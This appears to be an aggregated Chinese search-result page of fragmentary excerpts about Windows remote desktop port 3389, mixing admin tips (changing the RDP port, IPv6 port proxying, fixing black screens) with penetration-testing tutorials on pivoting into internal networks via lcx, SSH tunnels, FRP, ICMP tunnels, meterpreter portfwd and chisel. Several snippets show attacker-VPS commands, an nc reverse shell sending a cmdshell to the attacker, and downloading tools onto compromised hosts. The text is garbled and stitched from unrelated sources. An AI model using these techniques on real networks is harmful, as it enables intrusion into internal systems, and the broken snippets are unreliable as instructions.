安全卫士或360杀毒可能会拦截,信任后操作即可 这里分享.zip的文件 https://pan.baidu.com/s/1Rt3ZFXY0sOD5okeb9VI3_A image.png 软件运行效果如下,远程桌面端口请设置...1024-65535之间,填好你要修改的端口后,点击“修改端口”按钮,然后重启远程服务生效,重启后发现用新改的远程端口进不去,请查看安全组是否放行了新的远程端口。...image.png 重启远程服务运行services.msc找到remote desktop services 点重启按钮并点是 图片.png 图片.png 除过工具改远程端口号,还有注册表修改法...ControlSet002\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v "PortNumber" /t REG_DWORD /d 36970 /f 执行完命令后,重启远程服务...,然后在安全组放行新的远程端口号
今天在服务器端的攻击防护日志中看到3389端口被攻击了,查了一下3389是服务器远程端口,是服务器远程连接的默认端口,很多黑客都针对这个端口进行扫描,那如果修改远程连接的端口呢?...这个远程连接端口可以直接从注册表进行修改。修改两个地方。...(默认值是3389),然后修改为您想要使用的端口就可以了,如43890,但是不要选择一些我们常用的端口或者您的软件需要使用的端口,否则会出现端口冲突。...43890就可以了。...注意:修改完毕后,重启服务器,才会生效 服务器远程端口修改后怎么用?用户名后面加上刚刚修改具体的端口:43890,例如188.188.85.52:43890,密码不变,登录就可以了
今天给大家分享一下如何使用ipv6进行远程桌面3389端口登录,具体的教程,如下所示。...服务器端设置: 打开命令行 输入如下命令 netsh interface portproxy add v6tov4 listenport=3389 connectport=3389 通过 netstat...-ano | find "3389" 查看端口映射是否正确 正常应显示如下 TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 848TCP [::]:3389 [::]:0 LISTENING...848UDP 0.0.0.0:3389 *:* 848UDP [::]:3389 *:* 848 说明ipv6上端口3389监听成功 基本原理介绍: windows中的远程登录服务默认侦听在ipv4的...3389端口, 我们只需要打开一个ipv6的端口开始侦听,并把数据转发给ipv4的3389端口即可这也就是命令netsh interface portproxy 的意义 ----------------
服务器端设置: 打开命令行 输入如下命令 netsh interface portproxy add v6tov4 listenport=3389 connectport=3389 通过 netstat...-ano | find "3389" 查看端口映射是否正确 正常应显示如下 TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 848TCP [::]:3389 [::]:0 LISTENING...848UDP 0.0.0.0:3389 *:* 848UDP [::]:3389 *:* 848 说明ipv6上端口3389监听成功 基本原理介绍: windows中的远程登录服务默认侦听在ipv4的...3389端口, 我们只需要打开一个ipv6的端口开始侦听,并把数据转发给ipv4的3389端口即可这也就是命令netsh interface portproxy 的意义 ----------------
R问题 跑程序时电脑突然崩溃,程序被强制中断导致代码不见了怎么办?...这些糟心的情况想必每个打工人都不想经历,偏偏我就是那个倒霉蛋,今早打开电脑发现昨晚写的代码忘记保存,心态崩到想当场飙眼泪,冷静下来之后开始寻找解决方案: 解决方案 按照下述路径找到history_database...history_database文件内部内容 可以直接用Rstudio打开这个文件,打开之后就能看到代码编写历史记录啦,是不是超级有用,再也不用担心忘记保存咯。
而且像我这等穷人又没钱买死贵死贵的vps搭建云Kali,怎么办?这时候就要借助内网穿透工具了,网上很多工具都能实现,这里推荐Ngrok。...:8848(这里就不在赘述如何配置了,网上教程很多。)...PS:接下就要将对方的端口转发到我们本地了,以3389端口远程桌面为例。...二、转发3389端口到本地 1.在Kali中执行lcx监听和转发命令: ....3.开始在Kali中连接远程桌面连接: rdesktop 127.0.0.1:33891 ? ? ? ? 至此我们已经成功连接上了3389远程桌面。
在攻击者vps上面执行: ssh -CfNg -L 1153(vps端口) : 192.168.52.138(目标机ip) : 3389(目标端口) root@192.168.1.103(跳板机) //...访问vps本地1153端口,就可以访问内网Windows Server 8(192.168.52.138)的3389端口了: rdesktop 127.0.0.1:1153 可以看到,成功连上了内网Windows...远程转发实验 还是相似的测试环境,但此时内网中没有了边界设备,所以攻击者vps不能访问内网中的这三台机器;内网web服务器可以访问外网vps,windows server 8和域控制器都不能访问外网vps...我们的思路是:通过外网vps访问内网windows server 8的3389端口。...)的3389端口上,我们访问vps的3307端口,即可访问内网windows server 8的3389端口远程桌面了: 动态转发实验 前面介绍的端口转发类型都叫静态端口转发,所谓的 “静态” 是指应用程序服务器端的
: ptunnel -x Gamma 内网10.10.10.18 3389端口就被转发到攻击vps的8888端口了 4.3 icmp隧道搭建 安装icmptunnel git clone https:/...-CfNg -L :: root@目标外网Web服务器(会要求输入密码) ssh -CfNg -L 8080:10.1.1.3:3389 root@100.100.1.100...#VPS上查看8090端口是否已经连接 netstat -tulnp | grep "8090" #连接目标内网服务器的远程桌面 VPS-IP:8090 远程转发(反向) 在Web服务器上执行如下命令...ssh -CfNg -R :: root@VPS-IP(会要求输入密码) ssh -CfNg -R 8090:10.1.1.3:3389 root@192.168.0.1...#要转发的端口 remote_port = 7001#远程端口 plugin =socks5 访问vps 7001 则访问内网3389端口 启动的话就一个服务器.
简介 SSH会自动加密和解密所有SSH客户端与服务端之间的网络数据,还能够将其他TCP端口的网络数据通过SSH连接进行转发,并且自动提供了相应的加密及解密服务,这一过程被叫做“SSH隧道” (tunneling...7 | -L 进行本地端口转发 8 | -R 进行远程端口转发 9 | -D 动态转发,即socks代理 10 | -T 禁止分配伪终端 11 | -p 指定远程ssh服务端口 本地转发 把本地端口数据转发到远程服务器...简单说 就是通过☁️VPS这台机器把本地攻击机的33389端口转到了☁️目标服务器的3389端口上,也就是说这个ssh 隧道是建立在本地攻击机与☁️VPS之间的。...远程转发 把远程端口数据转发到本地服务器,本地服务器作为SSH客户端及应用服务端,称为反向tcp端口加密转发。...远程连接☁️VPS的3389端口,成功连接进入目标服务器(不出网)的远程桌面中。 ?
如果您自己有VPS也可以轻松搭建FRP,此处分享的是一个来自Github上的开源项目,这篇文章以CentOS 7 X64为例。...安装FRP Server 作者已经提供了编译好的二进制包,下载解压 - 然后修改配置文件即可。...auth_token = 123456 bind_port: 主服务需要监听的端口,这里使用7000 listen_port : 需要转发的端口,这里使用3389 auth_token: 相当于验证密码.../frps.ini 启动服务端,当然也别忘记在防火墙放行端口哦。如果需要服务在后台运行,可以将命令替换为:nohup ./frps -c ....IP local_port: 本地电脑监听的端口(Windows远程桌面服务默认监听3389) remote_port: Server端需要转发的端口 auth_token: 验证密码,上个步骤我们设置的
msf的meterpreter内置了端口转发功能,可以把内网的端口转发到本地。...portfwd add -l 5555 -p 3389 -r 172.16.86.153 转发目标主机的3389远程桌面服务端口到本地的8888,使用linux中的rdesktop连接本地的8888端口...0x04.2 lcx.exe 使用条件:服务器通外网,拥有自己的公网ip lcx是一个经典的端口转发工具,直接把3389转发到公网的vps上。...p1为监听的端口,p2为转发到的端口。 ./portmap -m 2 -p1 9999 -p2 33889 成功监听到转发出的3389端口。...使用Proxifier,配置ip和连接端口。 连接远程桌面成功。
这时候不要慌,不要急着联系售后重启服务器,因为此时除了远程连接不可用,其他一切应用是不受影响的,网站依旧可以打开,FTP依旧可以上传下载,不属于紧急故障。 重启会中断服务器运行,产生不良影响。...那么要怎么办呢? 解决办法1: 远程桌面连接-》选项-》高级-》去掉“主题”和“位图缓存”这两个选项,然后登陆服务器 解決的方法2: 一个用户黑屏后,使用另外一个管理员用户登陆。...解决办法3: 用增强的3389远程桌面登陆器登录试一试,能正常登录就重启服务器或vps。 ...解决办法4: 超出最大连接数(同样可以处理远程黑屏和蓝屏问题): 在本地电脑运行命令行: mstsc /console /v:你的服务器IP:远程端口 如果以上办法不能解决,不是急着登录服务器的话...,可以一直耗着,毕竟服务器是正常运行的,是在需要登录,就只能联系售后技术重启服务器了。
如果远程主机开启了相应的端口,且内网可连接外网的话,就会输出相应的端口信息。 3. CIMP 协议 用“ping”命令,执行 ping 。 4....在一些网络环境中,如果攻击者使用各类上层隧道(例如HTTP隧道、DNS隧道、常规端口转发等)进行的操作都失败了,由于防火墙不会屏蔽ping数据包,所以常常会通过ping命令访问远程主机,尝试建立ICMP...最后在攻击者vps上面访问其本地1080端口即可与数据库服务器的3389端口建立连接: ?...内网端口转发 在受害机(Windows)上面执行如下命令,将受害机3389端口的数据转发到攻击者公网VPS(Windows)的8000端口上。...此时即可登录用远程桌面登录:4444,即可访问受害者的3389端口远程桌面了。 ? Linux系统上面使用portmap: 先在具有公网ip的攻击机上执行: .
将stinger_server上传到目标服务器并开启服务端等待客户端连接 可能是因为文件太大,压缩之后还是没法传 这里使用命令行远程Wget来下载到目标服务器上。.../stinger_client -w http://自己的VPS:7777/proxy.php -l 127.0.0.1 -p 60000 此时目标机的60020端口已经映射到了VPS的60020端口了...在VPS上启动CS的服务端,然后设置监听,其中HTTP Hosts为目标机的ip地址,端口默认60020。...QW@34567 检测3389是否开启 端口是3389,设置代理直接登陆。 使用Proxifiler 登陆成功。...送书福利 为了感谢大家长期以来的支持,乌鸦安全开始了送书活动, 这次挑选了一本《Java核心技术及面试指南》送给1位粉丝。
绑定服务器的cmdshell并反向连接到vps(192.168.1.4)的TCP端口 ①vps开启监听 nc -lp 5555 ②服务器内网链接vps 5555端口,主动交出自己的cmdshell nc...程序分为两部分,admin(控制端)和agent(代理端节点),admin和agent所有选项用途均一致: -l 指定本地socks端口,等待远程连接 -c 指定远程socks机器ip -p 指定远程...通过配置已经将内网的3389端口转发到vps的7001端口。此时远程连接vps的7001即可远程连接内网的3389主机: ?...通与不通就缺了一个socks代理,我太爱proxychains了 ? ---- 三、MSF穿越多级网络 ?...爆破成功后,将远程目标机的端口转发到本地攻击 ①.端口转发 portfwd add -L 192.168.1.5 -l 33890 -r 192.168.75.131 -p 3389 ②.远程连接 rdesktop
内网穿透工具FRP的使用 目录 FRP 使用FRP建立隧道 服务端 客户端 使用FRP映射Web服务 服务端 客户端 使用FRP映射3389端口 服务端 客户端 FRP FRP(Fast Reverse...说明隧道搭建完成 然后访问http://100.20.14.14 就是相当于访问位于内网的主机 http://192.168.10.10 了 使用FRP映射3389端口 现在有这么一个场景,我们获得了位于内网的一台主机的权限...,并且知道了他的登录用户名和密码。...他的3389端口只对内网开放,现在我们需要将该主机的3389端口映射到公网我们的VPS的3389端口,那样,我们连接我们VPS的3389端口就相当于连接内网主机的3389端口了 服务端 位于公网的VPS...说明隧道搭建完成 远程连接100.20.14.14的3389端口即可。
说明:可以使用第一条命令,也可以使用第二条命令,其实第二条命令和第一条命令效果一样,只是省略了0.0.0.0,chisel的客户端默认使用的就是0.0.0.0这个IP。 ?...0x02 chisel进行远程桌面代理 首先需要两台windows主机和一台VPS,在这里使用VPS作为chisel服务器端,然后使用win7作为内网主机,使用win10作为我们的攻击者主机。...chisel客户端(win7的IP为192.168.223.151) chisel.exe client -v VPS:6666 R:0.0.0.0:33389:192.168.223.151:3389...(2):第二步:将win7的3389端口转发到VPS的33389端口 其实上一步已经完成了这一步操作,现在看一下chisel服务端和客户端的连接情况。 服务端 ? 客户端 ?...(3):第三步:使用攻击者主机连接win7的3389 ? 成功登录远程桌面。
什么情况下需要端口转发: Web服务器在内网中,远程桌面无法连接,因此需要进行端口转发。...内网IP的80端口通过端口映射到外网IP的80端口上, 内网的WEB服务器通过外网IP反向代理,这个情况下需要进行端口转发 服务器处于外网,可以访问外部网络,但是服务器安装了防火墙来拒绝敏感端口的连接...无外网IP 我们有一个外网IP:10.22.124.132 在目标机器上执行lcx.exe -slave 10.22.124.132 6666 127.0.0.1 3389...意思是把目标机器的 3389端口与公网服务器的 6666端口绑定。...我们直接访问本机的9999端口,通过vps的端口转发,相当于访问的是目标主机的3389端口。 此时已经成功登陆进来,我们查看IP,可以看到是目标机器。
远程桌面访问 然后再设置开启3389 2....例如:VPS监听本地端口,已控内网服务器来连接此端口,形成一个隧道。如果内网设备连接外网,就无法回弹只能再想其他办法。 3....的流量转发到了VPS的7777端口上,此时使用mstsc来访问公网的7777端口,相当于访问内网的3389端口。...机上运行监听的端口(如果首先运行内网机的话,会一直显示连接错误) 在VPS上运行 ....,VPS端就会显示现在将流量转发到7777端口上 然后在这个机器上再进行连接: 5.
img 然后设法远程桌面登录,查看3389是否开启: netstat -ano | find "3389" 发现是开启的 ?...,nmap扫描3389端口发现状态为filtered,看来是被防火墙给过滤了。...这里,我为了实验环境的真实,把我的攻击机kali当做了一个处于另一个局域网的主机,并用frp将msf映射到外网vps上面来实现对 “远程” windows7的控制: ? img 生成并上传木马 ?...用nmap扫描win2003的3389端口,发现其没有开启: proxychains4 nmap -p 3389 -Pn -sT 192.168.52.141 # -Pn和-sT必须要有 ?...img 再次扫描就开启了 ? img 开启远程桌面 ?
领取专属 10元无门槛券
手把手带您无忧上云